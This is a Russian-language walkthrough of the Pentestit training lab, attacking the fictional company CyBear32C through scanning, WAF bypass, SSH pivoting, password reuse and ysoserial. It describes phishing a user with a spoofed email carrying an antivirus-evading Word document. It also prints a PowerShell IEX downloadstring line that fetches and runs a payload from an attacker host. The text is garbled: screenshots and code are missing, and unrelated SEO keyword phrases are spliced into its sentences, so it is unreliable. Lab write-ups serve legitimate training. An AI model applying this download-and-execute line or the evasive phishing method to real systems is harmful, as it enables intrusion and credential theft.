Vulnerability assessment

Пентест-лаборатория pentestit

первую очередь

H Пентест-лаборатория Pentestit — полное прохождение


Прежде чем начать, нужно зарегистрироваться в лаборатории, настроить VPN-соединение и подключиться к сети виртуальной компании CyBear32C.
После регистрации и подключения мы видим следующую схему сети:
VPN-подключение остается за кадром, и после него мы получаем доступ к единственному внешнему IP компании CyBear32C 192.168.101.8, который в реальной жизни был бы шлюзом в интернет. уязвимость cisco asa Начнем, как обычно, с enumeration и, в частности, со сканирования портов, чтобы определить какие сервисы из внутренних подсетей доступны снаружи.
Начнем с того, чтобы зайти по адресу 192.168.101.8:
Часто многие Web Application Firewalls используют сигнатуры атак, которые можно обойти, немного изменив синтаксис: добавив конкатенацию или изменив регистр в запросе: vErSiOn вместо version, например. Обход WAF отдельная серьезная , которой можно посвятить множество книг и статей.
Теперь можно изучить сайт и потенциальные уязвимости внимательнее. Можно это делать и напрямую, но мне удобнее для этого использовать Burp Repeater. Для начала нужно настроить подключение через upstream proxy:
Во время сканирования портов обнаружился, в том числе, и https ресурс на порту 443. Беглый анализ и утилита dirb ничего интересного не дали:
Несмотря на предыдущее замечание, к сожалению, ни один из найденных паролей пока что не подошел к почте (которая обычно дает очень неплохие результаты в продвижении вглубь корпоративной сети). Не беда, попробуем подключиться к SSH на порту 22 и попробовать там. проверка на sql уязвимость Пробуем и видим следующую картину:
Ищем это в Google и вскоре находим аккаунт разработчика krakenwaffe на Github, который к тому же работает в компании cybear32c интересно!
После взятия SSH можно выходить на все остальные компьютеры в сети. С какого начать? В первую очередь стоит просканировать все три подсети с помощью nmap, любезно предоставленного нам прямо на сервере SSH, и изучить доступные сервисы.
Для обеспечения удобного доступа к внутренней сети через вновь появившееся SSH подключение есть целое множество способов.
+C и перейти в командный режим работы:
Сервер фото встречает нас формой для загрузки файлов и ничего больше, наверняка в ней и есть уязвимость.
И удачно получаем коннект:
Просканировав с помощью nmap сервер 172.16.0.4, находим открытый 21-й порт (ftp) и 22-й порт (ssh). sql уязвимость Естественно, вход с нашим ssh ключиком не срабатывает, поэтому сконцентрируемся на самом FTP.

    • новую учетную запись m.barry,

    • тестовый скрипт в папке m.barry/upload/test_scripts,

    • конфигурационный файл роутера cisco c паролями,


    К сожалению, просто так подложить файл в test_scripts нельзя недостаточно прав, поэтому придется продвигаться дальше и искать другой способ атаки на dev сервер.
    Попробуем воспользоваться найденной информацией и начнем с cisco пароль у нас уже есть. Вспоминаем IP по схеме сети и пробуем зайти:
    Продолжая изучать разные подсети, натыкаемся на сервер NAS:
    Как уже обсуждалось выше, пароли, найденные в одном месте, могут подойти в другом. В данном случае, просканировав порты сервера terminal2, мы видим открытый RDP:
    С получением доступа в локальную подсеть 192.168.3/24 у нас открываются новые возможности для атаки. Вспомним схему сети и заодно файл trouble.cap, найденный на FTP сервере:
    Теперь обратим свое внимание на сервер site-test. Как обычно в web задачах лаборатории, попробуем запустить whatweb и dirb, чтобы узнать, что есть на сервере.
    Попробуем изучить сервер portal. Начнем со сканирования портов.
    Получаем страницу отпусков и новые учетные данные:
    нужную нам команду (а именно reverse shell, в нашем случае).
    git clone https://github.com/frohoff/ysoserial.git
    mvn compile package
    Получаем нужный нам файл!
    В лаборатории используется сервер Roundcube, в котором было много уязвимостей, но в данной версии все известные уже исправлены.
    На сервере terminal закрыт порт 3389 для rdp, а в оставшихся нет ничего интересного. Где, как ни там, спрятался r.diaz и открывает Word-документы!

      • научиться отправлять письма r.diaz-у от r.lampman (его пароля к почте у нас нет),

      • сформировать документ с reverse shell payload,

      • обойти антивирус Microsoft Security Essentials,

      • включить listener на своем компьютере на порту 443 (только 80 и 443 открыты изнутри сети).



      Попробуем написать скрипт, который будет автоматически отправлять письма r.diaz-у от имени r.lampman с использованием пароля b.muncy.

        • заменить значение поле FROM на нужное,

        • подставить правильный MIME-тип, чтобы было понятно, что отправляется именно Word-документ

        • не забыть закодировать документ в base64, чтобы он не испортился при передаче,

        • пробросить порт 587 с 172.16.0.1 на локальную машину:


        Теперь нужно создать Word-документ, который не определяется антивирусами как зараженный. После множества неудачных попыток (удобно тестировать в своей среде перед настоящей атакой), получилось выработать рабочий вариант.
        Я использовал этот вариант запуска, описанный в этой статье.
        powershell.exe IEX ((new-object net.webclient).downloadstring('http://your_ip/payload.txt'))
        powershell.exe IEX ((new-object net.webclient).downloadstring('http://your_pentestit_ip/payload.txt'))

          • payload доступен по адресу your_ip/payload.txt,

          • порт 587 с 172.16.0.1 проброшен на локальный 127.0.0.1,

          • документ находится в папке вместе со скриптом для отправки почты.



          Остается последний сервер, на который пока что мы не нашли никаких зацепок в сети. Просканировав все его порты, определяем, что ни один из них не отвечает.
          Копируем ключ d.nash id_rsa себе на диск:
          Этот документ описывает всего лишь один из способов прохождения лаборатории. Уверен, что вариантов очень много. Если вы знаете какой-то интересный способ решения той или иной задачи, о котором я здесь не упомянул, буду рад узнать о нем в комментариях.

          Похожие статьи Pentest